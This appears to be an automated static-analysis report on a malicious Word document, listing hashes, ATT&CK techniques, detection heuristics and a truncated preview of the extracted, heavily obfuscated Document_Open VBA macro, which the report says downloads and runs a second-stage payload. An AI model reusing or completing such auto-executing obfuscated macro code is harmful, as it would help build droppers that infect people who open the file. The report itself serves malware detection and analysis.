Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 19f2c7093452e7e5…

MALICIOUS

Office (OLE)

Size: 202.7 KB
Created: 2019-12-20 07:10:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 72c6eb8e0e22603c036323b50045d758
SHA-1: adc8fbd2694e19bc2e3b035c24ee728c998afbfc
SHA-256: 19f2c7093452e7e5230593bed7cbcf8ce570ee2eadd6fa0513349c4f2dd4a175
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, a common technique for gaining initial execution when the document is opened. The macro source is heavily obfuscated and the extracted copy is truncated, but the presence of a GetObject call together with auto-execution and shell/download/object-execution tokens in the compiled p-code suggests it attempts to download and run a secondary payload. The document is likely delivered as a spearphishing attachment.

Heuristics (5)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro present.
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call present.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13029 bytes
SHA-256: 01c215d24daeefe990969e8c05c3b03bd61a086b369c7269601a3135fcc078a7

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Vxhmmvbaq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Uvyizjypph, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Qfxrbphtdohcu As String
Dim Vzhnsdtsv As String
Zpjrgufusy = Yhvepkxf
Siyfeutxm = (Pqrjlimx)
Kewjgxyeiymou = 61
Dim Tapkaulo As Boolean
Rdvdbkhyfh = "Accusamus ab eum sed."
Dim Wyxvtecn As Double
Dim Uisixmyeyquz As Double
Dim Dahoeqopyreq As String
Bgloiviml = (194)
Dim Vzajnhwjes As Double
Dim Oilgfkbegytdr As Integer
Rtkqpocjq = Ljhhjnijx
Dim Odckofwgxrice As String
Dim Bdilzuszyrwz As Boolean
Dim Uhgzuehne As String
Nkqocgcqplfbl = (Wddsrfga)
Cdkmmoyipl = ("Laboriosam quaerat.")
Kwltjztp = (Sridjmirgjnf)
Dim Sedxgtwv As Double
Thhywhgnchks = Emaxfaoewh
Wzydftpqq
   Dim Gkumihrvjg As Double
Dim Dkcczrfto As String
Uuhlarewpp = Usrfkdszyx
Glawtnzykaar = (Refjutuzhjhlv)
Wlxtpfpqhdcqk = 106
Dim Szdomntodiwg As String
Ohrjcopcymq = "Animi et et aliquam."
Dim Xgrckznrhhg As Integer
Dim Cxultylasv As Boolean
Dim Imepbrykz As Boolean
Lfmhpzhzk = (350)
Dim Lrimtrqnelgv As Boolean
Dim Jbfqitihpi As String
Rvalvabob = Oygtlqwfj
Dim Gxbjclkecahm As Integer
Dim Mspgunlwvqrb As Double
Dim Qscvwwodklype As Integer
Ghmgyyygzp = (Kcksalnnjx)
Dgjieieiolo = ("Sint dolore est architecto et molestiae.")
Vcysldgzn = (Ztxerjbi)
Dim Crppcqlotznbm As Double
Pvxteqqcii = Zrfkgmjski
End Sub

Attribute VB_Name = "Qzuqpezagbmaa"
Attribute VB_Base = "0{0982BE0D-4F0C-4E72-8F27-23E0D733C353}{1F187481-6304-4745-AF4B-2656848B55EB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Miqfbsgds"
Function Vfbbzngres()
   Dim Pxrhifzlzvlc As String
Dim Xpfftqarxt As String
Ngxvkylofaace = Qoeroetmumk
Syaxymssod = (Rkhwocatzkc)
Usuucjzo = 743
Dim Gadeshybksext As String
Gkkpkhvhveu = "Tempora cumque modi quia."
Dim Mumzpoawlyima As String
Dim Axwyiewzpyro As Integer
Dim Hayjapqgfiek As Double
Lbdjzegyhvpu = (910)
Dim Xaxaqeexkcas As String
Dim Souylbnnviog As String
Sctfzuifl = Oqnraigcmgtb
Dim Nijeoljsvf As Boolean
Dim Vtglncqdwl As Boolean
Dim Uaiezcybcxmmz As String
Slwuijrnnwatq = (Mcinjodfstg)
Xhummgxsz = ("Magnam consectetur labore.")
Mdmuhziiqnk = (Lqipgebc)
Dim Pgbngknwmm As Double
Gbixtlyp = Xqawximvooh
Ytgqobwapext = Vxhmmvbaq.Uvyizjypph
   Dim Ywdggzsakinwk As Integer
Dim Mthdwzpnoli As String
Pmiyobtov = Yqqmuzvs
Rwfdjwiiov = (Jlyaohixb)
Gegjdsoqpbvy = 796
Dim Vffkghfd As Double
Fnuknkrla = "Corey"
Dim Zcnfpzeihomix As Double
Dim Dnvjmdpa As Double
Dim Xdcfjjxldwc As Boolean
Qhauirsex = (542)
Dim Geqqrvjciq As Double
Dim Ccxeoxuxzliec As Integer
Gilkamqyet = Hmzjoylyskmd
Dim Tlvwlogm As Double
Dim Xfrjldslidml As String
Dim Tfrnqvwi As Boolean
Tfdiisnvifmih = (Orbveqiltc)
Svhxocuqgzkcp = ("Quidem accusamus.")
Cuqlypacevmz = (Ukgcuvzbhx)
Dim Lfohyfozfqc As String
Istdcbdnf = Davusbmteld
Cghzatntygqc = Ytgqobwapext + Qzuqpezagbmaa.Dzglcoabtn + Qzuqpezagbmaa.Vxqripsemcmx + Qzuqpezagbmaa.Sgydedibfwog
   Dim Lugkrqtb As String
Dim Avlkjhwqphxb As String
Ijkdbmlmixqrq = Bevofaemsrzjk
Cjoibifqzqjo = (Urqfsncbmzx)
Slccbkqugdiop = 722
Dim Wywmrxxajdr As Double
Bxplylmfwni = "Ratione porro optio dolorem saepe repellendus repudiandae cumque autem."
Dim Uooiqdqoeodkl As Double
Dim Ksyjvbtjnxqd As Double
Dim Zkojvdima As Integer
Yawimammrve = (885)
Dim Hvbfalzaggedo As Double
Dim Vmyslvxawab As Double
Rtmvwpbab = Pnnsurexzw
Dim Wldckuef As Double
Dim Vintihzapuj As Integer
Dim Xifgevex As Double
Oqktnrgx = (Asefaixyzg)
Kifufozjurnh = ("Doloribus consequuntur ducimus esse quia ea qui a.")
Ynlijwmz = (Dzfwygybe)
Dim Bntlrxosi As Double
Hxjjmqxzikgaq = Dkotlcdxxa
Domfzqsqs = Cghzatntygqc + Qzuqpez
... (truncated)